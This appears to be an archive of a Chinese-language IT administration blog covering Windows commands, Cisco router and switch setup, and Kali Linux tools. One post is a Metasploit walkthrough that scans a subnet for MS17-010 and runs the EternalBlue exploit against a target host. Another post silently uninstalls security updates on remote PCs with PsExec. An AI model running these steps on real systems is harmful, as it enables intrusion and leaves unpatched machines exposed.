2018年5月17日 星期四

WIN10查詢及設定Dynamic Port Range(Source Port Range)


查詢預設Dynamic Port Range,開啟cmd命令提示字元

C:\Users\XXXX>netsh int ipv4 show dynamicportrange tcp
通訊協定 tcp 動態連接埠範圍
---------------------------------
開始連接埠        : 49152
連接埠數目        : 16384

C:\Users\XXXX>netsh int ipv4 show dynamicportrange udp
通訊協定 udp 動態連接埠範圍
---------------------------------
開始連接埠        : 49152
連接埠數目        : 16384


設定Dynamic Port Range (Source Port Range),ex:開始連接埠:10000,數目1000

C:\Users\XXXX>netsh int ipv4 set dynamicportrange protocol=tcp startport=10000 numberofports=1000
C:\Users\XXXX>netsh int ipv4 set dynamicportrange protocol=udp startport=10000 numberofports=1000


參考網址:
https://support.microsoft.com/en-us/help/929851/the-default-dynamic-port-range-for-tcp-ip-has-changed-in-windows-vista
http://www.ncftp.com/ncftpd/doc/misc/ephemeral_ports.html#Changing

2018年1月11日 星期四

使用CMD指令快速更改IP


建立一個批次檔,如:ChangeIP.bat,將底下內容貼近去儲存後執行執行
ps.常用IP依照實際需求改一下
************************************************************
@Echo off
cls
echo 快速更換IP
set NicName=乙太網路

rem 設定常用IP(ex:公司使用)
set IP=192.168.1.1
set MASK=255.255.255.0
set Gateway=192.168.1.254
set DNS1=168.95.1.1
set DNS2=8.8.8.8

:Start
cls
echo 1.自動取得IP(DHCP)
echo 2.設定常用IP(ex:公司使用)
echo 3.手動輸入IP
set /P select1=請選擇您要設定的方式:
if %select1%==1 goto Stage1
if %select1%==2 goto Stage2
goto Stage3


:Stage1
echo 自動取得IP中...
netsh interface ip set address %NicName% dhcp
netsh interface ip set dnsserver %NicName% dhcp
echo 自動取得IP完成
Pause
goto Stage4

:Stage2
cls
echo 常用IP設定中...
netsh interface ip set address %NicName% static %IP% %MASK% %Gateway% 1
netsh interface ip set dnsserver %NicName% static %DNS1%
netsh interface ip add dnsserver %NicName% %DNS2%
echo 常用IP設定完成
Pause
goto Stage4

:Stage3
cls
set /P inputIP=請輸入IP Adress:
set /P inputMASK=請輸入子網路遮罩:
set /P inputGateway=請輸入預設閘道:
set /P inputDNS1=請輸入主要DNS:
set /P inputDNS2=請輸入次要DNS:
echo IP設定中...
netsh interface ip set address %NicName% static %inputIP% %inputMASK% %inputGateway% 1
netsh interface ip set dnsserver %NicName% static %inputDNS1%
netsh interface ip add dnsserver %NicName% %inputDNS2%
echo IP設定完成
Pause
goto Stage4

:Stage4
cls
Echo 您目前的IP如下
ipconfig /all
pause

2018年1月8日 星期一

Cisco-ACL

ACL種類
數字範圍或名稱
差異
Number Standard
1-99,1300-1999
檢查IP或網段
Number Extended
100-199,2000-2699
檢查來源、目的、協定、服務
Named(Standard and Extended)
Name


一、Number Standard標準ACL
允許IP -192.168.0.1
Router(config)#access-list 1 permit host 192.168.0.1

拒絕IP-192.168.0.1
Router(config)#access-list 1 deny host 192.168.0.2

允許IP網段-192.168.1.0~192.168.1.255
Router(config)#access-list 1 permit 192.168.1.0 0.0.0.255

拒絕IP網段-192.168.2.0~192.168.2.127
Router(config)#access-list 1 deny 192.168.2.0 0.0.0.127

拒絕IP網段-192.168.3.0~192.168.3.63
Router(config)#access-list 1 deny 192.168.3.0 0.0.0.63

gi0/0啟動ACL
Router(config)#int gi0/0
Router(config-if)#ip access-group 1 out

顯示ACL
Router#show access-lists
Standard IP access list 1
10 permit host 192.168.0.1
20 deny host 192.168.0.2
30 permit 192.168.0.128 0.0.0.127
40 permit 192.168.1.0 0.0.0.255
50 deny 192.168.2.0 0.0.0.127
60 deny 192.168.3.0 0.0.0.63

允許IP網段-192.168.0.0~192.168.255.255可以VTY(Telnet)Router
Router(config)#access-list 10 permit 192.168.0.0 0.0.255.255
Router(config)#line vty 0 15
Router(config-line)#access-class 10 in

二、Number Extended延伸ACL
允許192.168.0.1使用IP Protocol連至任一網路位址
Router(config)#access-list 100 permit ip host 192.168.0.1 any

拒絕任一網路位址使用80 Port連線至192.168.0.1
Router(config)#access-list 100 deny tcp any host 192.168.0.1 eq 80

拒絕192.168.1.0~255使用21 Port連線至192.168.2.0~255
Router(config)#access-list 100 deny tcp 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 eq 21

拒絕所有封包通過
Router(config)#access-list 100 deny ip any any

gi0/1啟動ACL
Router(config)#int gi0/1
Router(config-if)#ip access-group 100 out

顯示ACL
Router#show access-lists
Extended IP access list 100
10 permit ip host 192.168.0.1 any
20 deny tcp any host 192.168.0.1 eq www
30 deny tcp 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 eq ftp
40 deny ip any any

三、Named 命名延伸ACL
Router(config)#ip access-list standard {<1-99>|Access-list name}
Router(config)#ip access-list standard teacher
Router(config-std-nacl)#permit 172.16.0.0 0.0.255.255
Router(config-std-nacl)#deny any
Router(config-std-nacl)#exit
Router(config)#int gi0/0
 Router(config-if)#ip access-group teacher out
Router(config-if)#^z
Router#sh ip access-lists
Standard IP access list teacher
10 permit 172.16.0.0 0.0.255.255
20 deny any


Router(config)#ip access-list extended {<100-199>|Access-list name}
Router(config)#ip access-list extended student
Router(config-ext-nacl)#permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
Router(config-ext-nacl)#permit tcp 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 eq 80
Router(config-ext-nacl)#deny ip any any
Router(config-ext-nacl)#exit
Router(config)#int gi0/1
Router(config-if)#ip access-group student out
Router(config-ext-nacl)#^Z
Router#sh ip access-lists
Extended IP access list student
10 permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
20 permit tcp 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 eq www

30 deny ip any any

2018年1月3日 星期三

Cisco-Port Security

啟用port-security
Switch#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
Switch(config)#int fa0/1
Switch(config-if)#switchport port-security  ##Switchport預設為dynamic,須改為access才可啟用port-secruity
Command rejected: FastEthernet0/1 is a dynamic port.
Switch(config-if)#switchport mode access ##將switchport mode更改為存取埠(access)模式
Switch(config-if)#switchport port-security ##啟用port-secruity
Switch#show port-security interface fa0/1  ##查詢fa0/1的port-secruity狀態

手動輸入綁定Mac address
Switch(config)#int fa0/1 
Switch(config-if)#switchport port-security mac-address 00d0.ffa7.5801 ##設定靜態MAC
Found duplicate mac-address 00d0.ffa7.5801.   ##因MAC Address-Table已有此MAC紀錄,需要先關閉此介面才可設定
Switch(config-if)#shutdown
%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to administratively down
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to down
Switch(config-if)#switchport port-security mac-address 00d0.ffa7.5801
Switch(config-if)#no shutdown
Switch(config-if)#
%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
Switch(config-if)#
Switch#show port-security interface fa0/1  ##查詢fa0/1的port-secruity狀態
Switch#show port-security address   ##查詢Secure Mac Address Table

設定MAC最大連線數
Switch(config-if)#switchport port-security maximum 2  ##設定最大連線數為2(預設為1)
Switch(config-if)#switchport port-security mac-address 00d0.ffa7.5802  ##設定靜態MAC
Switch(config-if)#shutdown
Switch(config-if)#no shutdown
Switch(config-if)#do show port-security interface fa0/1  ##查詢fa0/1的port-secruity狀態

設定自動紀錄MAC(Sticky)
Switch(config)#int fa0/2 
Switch(config-if)#switchport mode access     
Switch(config-if)#switchport port-security           
Switch(config-if)#switchport port-security maximum 2         
Switch(config-if)#switchport port-sceurity mac-address sticky ##設定自動記錄MAC
此時可以分別接上2台設備做連線測試,讓Switch可記錄2台的MAC Address,學習到的MAC會自動寫入Run組態檔
Switch(config-if)#do show port-security interface fa0/2  ##查詢fa0/2的port-secruity狀態
Switch#show port-security address  ##查詢Secure Mac Address Table

設定違規安全MAC處理方式(Violation Mode)
Switch(config-if)#switchport port-security violation ?
  protect   Security violation protect mode ##保護認證過的MAC,阻擋未認證的MAC
  restrict  Security violation restrict mode ##保護認證過的MAC,阻擋未認證的MAC,並紀錄在Log中
  shutdown  Security violation shutdown mode ##此為預設值,會讓該Port Shutdown,被停用後必須輸入shutdown再輸入no shutdown才可以解除

其他指令
Switch#show mac-address-table      ##查詢交換器上的mac table
Switch#clear mac-address-table       ##清除交換器上的mac table
Switch#show port-security address  ##查詢Secure Mac Address Table
Switch#clear port-security all          ##清除Secure Mac Address Table


2018年1月2日 星期二

Cisco VLAN and Trunk

Cisco VLAN and Trunk

VLAN
1.建立Vlan 10,命名為student,將所有的Ports移至Vlan 10
Switch#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
Switch(config)#vlan 10
Switch(config-vlan)#name students
Switch(config-vlan)#do sh vlan
Switch(config)#int range fa0/1-24,gi0/1-2
Switch(config-if-range)#switchport access vlan 10
Switch(config-if-range)#do sh vlan

Trunk
指定fa0/24介面為Trunk Port
Switch(config)#int fa0/24
Switch(config-if)#switchport mode trunk
Switch(config-if)#do show int trunk
Switch(config-if)#do sh int fa0/24 switchport
Switch(config-if)#switchport nonegotiate      #停止協商
Switch(config-if)#switchport trunk native vlan 10  #修改Native Vlan (no tag)
Switch(config-if)#do sh int trunk
Switch(config-if)#switchport trunk allowed vlan 10  #限制Vlan 10才可使用主幹連線
Switch(config-if)#do sh int trunk
Switch(config-if)#switchport trunk allowed vlan add 20  #增加Vlan 20也可使用主幹連線
Switch(config-if)#do sh int trunk
Switch(config-if)#switchport trunk allowed vlan remove 20  #取消Vlan 20使用主幹連線
Switch(config-if)#do sh int trunk

2018年1月1日 星期一

使用指令移除微軟更新程式KBXXXXXXX

以無訊息模式移除安全性更新
「wusa.exe /uninstall /kb:3191898 /quiet /norestart」

如有多部電腦,可從遠端移安全性更新
「Psexec -d -s \\PCNAME wusa.exe /uninstall /kb:3191898 /quiet /norestart」

2017年12月18日 星期一

Cisco Router 登入帳號密碼建立

建立帳號密碼
Router(config)#username ciscoadmin password  kali224466

提升最高權限
Router(config)#username ciscoadmin privilege 15

設定進入Console密碼
Router(config)#line console 0
Router(config-line)#password kali224466
Router(config-line)#login

設定進入Telnet密碼
Router(config)#line vty 0 15
Router(config-line)#password kali224466
Router(config-line)#login

設定enable的密碼
Router(config)#enable password kali224466

設定enable的密碼以加密方式儲存(登入時優先輸入)
Router(config)#enable secret kali22446688

以上密碼(除enable secret)使用show run就可以看到密碼,可以使用service password-encryption針對密碼進行加密
Router(config)#service password-encryption

使用本地帳號驗證
Router(config)#line console 0
Router(config-line)#password kali224466
Router(config-line)#login local

2017年10月30日 星期一

Kali Linux - Metasploit 使用方法

1.更新metasploit版本
apt-get update
apt-get install metasploit-framework

2.開啟Metasploit
msfconsole

3.常用指令說明
help:檢視執行指令的資訊
search module:搜尋特定模組
use module:載入特定模組
info:查訊目前使用模組的資訊
options:查看需要設定的參數
set option module:設定模組內的參數
check:測試
run:執行滲透攻擊模組
back:回到上層

範例 - 攻擊Microsoft的MS17_010漏洞

search ms17_010


a.大範圍搜索攻擊目標
use auxiliary/scanner/smb/smb_ms17_010
options
set RHOSTS 192.168.33.1/24
set THREADS 16
run


















 
b.攻擊特定目標
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOST 192.168.33.106
RUN


c.滲透成功
ipconfig
whoami

2017年10月26日 星期四

Word、Excel、PowerPoint無法插入物件(CAD圖檔 *.dwg)、或開啟物件(CAD圖檔 *.dwg)會出現錯誤訊息

問題描述:
1.Word、Excel、PowerPoint插入物件DWG圖檔,出現「無法插入物件」。
2.開啟Word、Excel、PowerPoint內DWG圖檔,出現「無法啟動此內嵌物件的來源應用程式」。











解決方法:
1.查詢AutoCAD版本的CLSID
執行「regedit」開啟登錄編輯程式,展開HKEY_CLASSES_ROOT\AutoCAD.Drawing.[格式編號]\CLSID,查詢AutoCAD的CLSID。
ex:
HKEY_CLASSES_ROOT\AutoCAD.Drawing.20\CLSID =>AutoCAD 2016
HKEY_CLASSES_ROOT\AutoCAD.Drawing.21\CLSID =>AutoCAD 2017

目前已知的AutoCAD版本CLSID碼如下
R14:{5E4405B0-5374-11CE-8E71-0020AF04B1D7}
2000/2001/2002:{4D3263E4-CAB7-11D2-802A-0080C703929C}
2004/2005/2006:{8E75D913-3D21-11D2-85C4-080009A0C626}
2007/2008/2009:{7AABBB95-79BE-4C0F-8024-EB6AF271231C}
2010/2011/2012:{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}
2013/2014/2015:{6A221957-2D85-42A7-8E19-BE33950D1DEB}
2016:{149DD748-EA85-45A6-93C5-AC50D0260C98}
2017:{720DB9AF-D62C-4ED0-A377-429C22312852}


2.複製底下米字內的內容,貼上至記事本,根據您使用的CAD版本,更改@後面的CLSID值(以下是使用AutoCAD 2016),儲存為reg檔後執行。

******************************************************************************
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{5E4405B0-5374-11CE-8E71-0020AF04B1D7}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

[HKEY_CLASSES_ROOT\CLSID\{4D3263E4-CAB7-11D2-802A-0080C703929C}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

[HKEY_CLASSES_ROOT\CLSID\{8E75D913-3D21-11d2-85C4-080009A0C626}\AutoConvertTo]
@="{149DD748-EA85-45A6-93C5-AC50D0260C98}"

2017年10月11日 星期三

Cisco Router 重開機會進入rommon模式

請檢查映像檔是否還在及組態暫存器值,也可試著設定boot system

1.檢查falsh0內的IOS 映像檔是否還在
Cisco_Router#dir flash:
Directory of flash0:/

    1  -rw-    76900964   Sep 2 2015 14:11:48 +00:00  c1900-universalk9-mz.SPA.155-1.T1.bin
    2  -rw-        3066   Sep 2 2015 14:20:34 +00:00  cpconfig-19xx.cfg
    3  -rw-         720  Dec 29 2015 11:29:16 +00:00  vlan.dat
    4  drw-           0   Sep 2 2015 14:20:56 +00:00  ccpexp
  459  -rw-        2885   Sep 2 2015 14:24:46 +00:00  home.shtml

2.檢查當前的組態暫存器值是否為0x2102
Cisco_Router#show version

Configuration register is 0x2102

如果不是0x2102,更改指令如下
Cisco_Router#conf t
Cisco_Router(config)#config-register 0x2102
[Ctrl-Z]
Cisco_Router#reload

3.設定boot system
Cisco_Router#dir flash:
Directory of flash0:/

    1  -rw-    76900964   Sep 2 2015 14:11:48 +00:00  c1900-universalk9-mz.SPA.155-1.T1.bin
    2  -rw-        3066   Sep 2 2015 14:20:34 +00:00  cpconfig-19xx.cfg
    3  -rw-         720  Dec 29 2015 11:29:16 +00:00  vlan.dat
    4  drw-           0   Sep 2 2015 14:20:56 +00:00  ccpexp
  459  -rw-        2885   Sep 2 2015 14:24:46 +00:00  home.shtml

設定前,無boot system資料
Cisco_Router#show run | inc boot
boot-start-marker
boot-end-marker

Cisco_Router#conf t
Cisco_Router(config)#boot system flash0:c1900-universalk9-mz.SPA.155-1.T1.bin
[Ctrl-Z]
Cisco_Router#write

設定後
Cisco_Router#show run | inc boot
boot-start-marker
boot system flash0:c1900-universalk9-mz.SPA.155-1.T1.bin
boot-end-marker

2017年9月29日 星期五

Kali Linux 設定IP

1.修改 /etc/network/interfaces 內容
root@kali~#nano /etc/network/interfaces

2.設定使用模式

DHCP(自動取得IP)
auto eth0
iface eth0 inet dhcp

Static IP(固定IP)
auto eth0
iface eth0 inet static
address 192.168.1.100  # IP位址
netmask 255.255.255.0  # 子網路遮罩
gateway 192.168.1.254  # 預設閘道

3.重新啟動網路或重開機
root@kali~#sudo /etc/init.d/networking restart #重啟網路
root@kali~#ifdown eth0 && ifup eth0  #重啟網路介面卡
root@kali~#reboot #重新開機

2017年9月20日 星期三

使用cmd指令刪除n天前的檔案(forfiles)



FORFILES [/P pathname] [/M searchmask] [/S] [/C command] [/D [+ | -] {yyyy/MM/dd | dd}]

    /P    pathname      表示要開始搜尋的路徑。
                        預設資料夾是目前的
                        目錄 (.)。

    /M    searchmask    根據 searchmask 搜尋檔案。
                        預設的 searchmask 是 '*'。

    /S                  指示 forfiles 遞迴搜尋
                        子目錄。例如 "DIR /S"。

    /C    command       表示每個檔案要執行的命令。
                        命令字串應該包含在雙括號
                        之間。
                        預設的命令是 "cmd /c echo @file"。

    /D    date          選取檔案上次修改的時間大於或
                        等於 (+) 、小於或等於 (-),
                        使用 "yyyy/MM/dd" 格式指定的日期;
                        或選取檔案上次修改
                        的時間大於或等於 (+)
                        目前的日期再加上 "dd" 天、
                        小於或等於 (-) 目前的日期減去 "dd" 天。
                        有效的 "dd" 可以是介於
                        0 - 32768 之間的數字。
                        如果未指定,"+" 將被視為預設符號。

範例如下

刪除放在D:\LOG目錄內10天以前的記事本檔案
forfiles /P "D:\LOG" /S /M *.txt /D -10 /C "cmd /c del @path"

列出並刪除放在D:\LOG目錄內10天以前的記事本檔案
forfiles /P "D:\LOG" /S /M *.txt /D -10 /C "cmd /c echo delete @path && del @path"

列出放在D:目錄內所有的批次檔
forfiles /P "D:" /S /M *.bat /C "cmd /c echo @path"

複製D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c copy @path E:\Archive"

列出並複製D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c echo copy @path && copy @path E:\Archive"

搬移D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c move @path E:\Archive"

列出並搬移D:\WORK目錄內10天以前的檔案到E:\Archive
forfiles /P "D:\WORK" /S /D -10 /C "cmd /c echo move @path && move @path E:\Archive"



2017年9月19日 星期二

使用cmd指令新增或刪除TCP/IP印表機、驅動、連接埠

1.用指令刪除印表機、驅動、連接埠

rem ***刪除印表機***
rem -p 印表機名稱
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-TW\prnmngr.vbs -d -p "FX ApeosPort-IV C4470 PCL 6"

rem ***刪除印表機驅動程式***
rem /m 印表機驅動程式型號名稱
rundll32 printui.dll,PrintUIEntry /dd /m "FX ApeosPort-IV C4470 PCL 6"

rem ***刪除連接埠***
rem -r 連接埠名稱 
rem -h 裝置的 IP 位址
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-TW\prnport.vbs -d -r IP_192.168.1.5 -o raw -n 9100 -h 192.168.1.5


2.用指令新增印表機、驅動、連接埠

rem ***建立連接埠***
rem -r 連接埠名稱 
rem -h 裝置的 IP 位址
cscript C:\Windows\system32\Printing_Admin_Scripts\zh-TW\prnport.vbs -a -r IP_192.168.1.5 -o raw -n 9100 -h 192.168.1.5

rem ***安裝印表機及驅動***
rem /b 印表機名稱,可隨意取名
rem /f inf檔案路徑
rem /r 連接埠名稱
rem /m 印表機驅動程式型號名稱
rundll32 printui.dll,PrintUIEntry /if /b "FX ApeosPort-IV C4470 PCL 6" /f "\\192.168.1.1\fxap4c4470\FX6KYAL.INF" /r "IP_192.168.1.5" /m "FX ApeosPort-IV C4470 PCL 6"

rem ***設定預設印表機***
rem /n 印表機名稱
rundll32 printui.dll,PrintUIEntry /y /n "FX ApeosPort-IV C4470 PCL 6"

2017年8月30日 星期三

使用cmd指令新增、刪除使用者帳號與群組

1. 新增、修改、刪除使用者
建立使用者帳戶,帳號User1 密碼123456
net user user1 123456 /add

修改使用者帳號密碼,帳號User1 密碼改為12345678
net user user1 12345678

刪除使用者帳號User1
net user user1 /del

2. 新增、刪除群組
新增一個 Groups1 群組
net localgroup groups1 /add

刪除 Groups1 群組
net localgroup groups1 /del

3. 新增使用者帳號到指定群組
使用者帳號User1加入至Groups1群組
net localgroup groups1 user1 /add

網域帳號contoso\jack加入至本機Groups1群組
net localgroup groups1 contoso\jack /add

刪除Groups1群組中的使用者帳號User1
net localgroup groups1 user1 /del


2017年8月29日 星期二

Kali Linux 安裝OpenVAS

下載VirtualBox及安裝
https://www.virtualbox.org/wiki/Downloads
下載Kali Linux Image並安裝在VirtualBox內
https://www.kali.org/downloads/

1.安裝好Kali Linux後,修改鏡像源定義文件
nano /etc/apt/sources.list
清空文件内所有内容及添加
deb http://http.kali.org/kali kali-rolling main contrib non-free
CTRL+O 確認並存檔
CTRL+X 退出

2、更新
apt-get update
apt-get upgrade
apt-get dist-upgrade

3、安裝OpenVAS
apt-get install openvas  #安裝OpenVAS
openvas-setup #自動設定環境、下載憑證及定義檔
openvas-check-setup  #檢查安裝
openvasmd --create-user admin1  #建立帳號
openvasmd --user=admin1 --new-password=openvas #更改密碼
openvas-feed-update #升级
openvas-stop
openvasmd --rebuild
openvas-start
netstat -tlnp  #確認9390跟9392兩個port已在LISTEN狀態
https://127.0.0.1:9392 (在Kali開啟瀏覽器,輸入IP打開操作介面)

PS.每次重開機需要執行底下指令(OpenVAS的bug)
openvas-stop
openvasmd --rebuild
openvas-start

2017年8月21日 星期一

Cisco Router 更新 IOS 映像檔(使用TFTP)


1.下載新IOS https://software.cisco.com/download/navigator.html?mdfid=268437899

2.電腦開啟TFTP軟體

3.連上Cisco Router ( Console or Telnet )

4.檢查當前的 Cisco IOS 映像檔
Cisco_Router#show version
Cisco_Router#dir flash:

5.上傳IOS到Router,輸入TFTP IP及新IOS檔名
Cisco_Router#copy tftp flash
Address or name of remote host []?172.16.0.100
Source filename []?c1900-universalk9-mz.SPA.155-3.M6.bin
Destination filename [c1900-universalk9-mz.SPA.155-3.M6.bin]?Enter
Accessing tftp://172.16.10.100/c1900-universalk9-mz.SPA.155-3.M6.bin...
Loading c1900-universalk9-mz.SPA.155-3.M6.bin from 172.16.10.100 (via Vlan100):
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[OK - 79736636 bytes]

79736636 bytes copied in 151.816 secs (525219 bytes/sec)

Cisco_Router#

6.檢驗IOS是否上傳成功及檢查新IOS映像檔是否完整
Cisco_Router#dir flash:
Cisco_Router#verify flash:c1900-universalk9-mz.SPA.155-3.M6.bin

7.預設情況下,路由器的啟動序列會載入快閃記憶體中所列出的第一個 Cisco IOS 映像檔。保證路由器載入新映像檔的方法之一是設定 boot system flash 命令。
Cisco_Router(config)#boot system flash c1900-universalk9-mz.SPA.155-3.M6.bin
Cisco_Router(config)#end
Cisco_Router#copy running-config startup-config
Destination filename [startup-config]?Enter
Building configuration...
[OK]
Cisco_Router#

8.測試新映像檔
使用reload指令重啟路由器,重啟後使用show version檢查新IOS映象檔是否已位於RAM中
Cisco_Router#reload
Proceed with reload? [confirm]Enter
Cisco_Router#show version

9.刪除舊的IOS
Cisco_Router#delete flash0:/c1900-universalk9-mz.SPA.154-3.M3.bin
Delete filename [c1900-universalk9-mz.SPA.154-3.M3.bin]? Enter
Delete flash0:/c1900-universalk9-mz.SPA.154-3.M3.bin? [confirm] Enter
Cisco_Router#

2017年8月18日 星期五

2017年8月14日 星期一

Cisco Router設定檔備份與還原(使用TFTP)

1.下載TFTP軟體,開啟TFTP主程式,選好Server interface
http://tftpd32.jounin.net/



















2.使用Console或Telnet進入Cisco介面,執行備份指令
Cisco_Router#copy startup-config tftp:
Address or name of remote host []? 172.16.0.100    //輸入TFTP Server IP位址
Destination filename [cisco_router-confg]?              //備份至目的地的檔案名稱
!!
7289 bytes copied in 0.064 secs (113891 bytes/sec)








3.如需還原設定檔,可執行還原指令:
Cisco_Router#copy tftp: startup-config 
Address or name of remote host []? 172.16.0.100    //輸入TFTP Server IP位址
Source filename []? cisco_router-config                   //備份的檔案名稱
Destination filename [startup-config]?
Accessing tftp://172.16.0.100/cisco_router-confg...
Loading cisco_router-confg from 172.16.0.100 (via vlan100): !
[OK - 7289 bytes]
[OK]
7289 bytes copied in 0.476 secs (15313 bytes/sec)

2017年8月10日 星期四

Cisco Router密碼重設

Cisco路由器組態暫存器,數值預設0x2102,另一常數值0x2142,使用0x2142數值,在開機過程中會略過NVRAM中的Startup-Config,因此不須密碼即可進入路由器的特權模式

密碼重設步驟
1.
電腦連接RouterConsole Port,開啟PUTTY(或超級終端機)

2.開啟Router電源,接著按下鍵盤的 Ctrl + Break 中斷 Router 開機程序,進入ROM模式

3.更改組態暫存器的值(由預設的 0x2102 變更為 0x2142)
    rommon 1 > confreg 0x2142

4.使用 reset 指令重新載入 IOS,重載的IOS會因0x2142 的值而忽略 NVRAM 設定檔
    You must reset or power cycle for new config to take effect
    rommon 2 > reset

5.使用 enable 進入特權模式。
    Router> enable

6.恢復之前的Config設定,將NVRAMStartup-Config複製到RAMRunning-Config
   Router# copy startup-config running-config   Destination filename [running-config]?
   2122 bytes copied in 1.125 secs (1886 bytes/sec)
   Router#

7.更改特權模式(enable)密碼或取消密碼
   Router# conf t
   Router(config)# enable secret XXXXXX  或者 no enable secret

8.密碼變更完成,復原組態暫存器之值。
   Router(config)# config-register 0x2102

9.設定完密碼後,將Running-Config寫回Startup-Config
   Router# copy running-config startup-config Destination filename [startup-config]?
   Building configuration...
    [OK]

10.重啟Router
     Router# reload

2017年8月8日 星期二

使用指令建立或移除Windows Service

建立Windows Service
1. 開啟Cmd
2. 輸入
sc create "服務名稱" binPath= "可執行檔所在路徑" displayname= "顯示名稱" start= auto
ex: sc create "AdobeARMservice" binPath= "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" displayname=  "Adobe Acrobat Update Service" start= auto


移除Windows Service
1. 開啟Cmd
2. 輸入sc delete "服務名稱"
ex: sc delete "AdobeARMservice"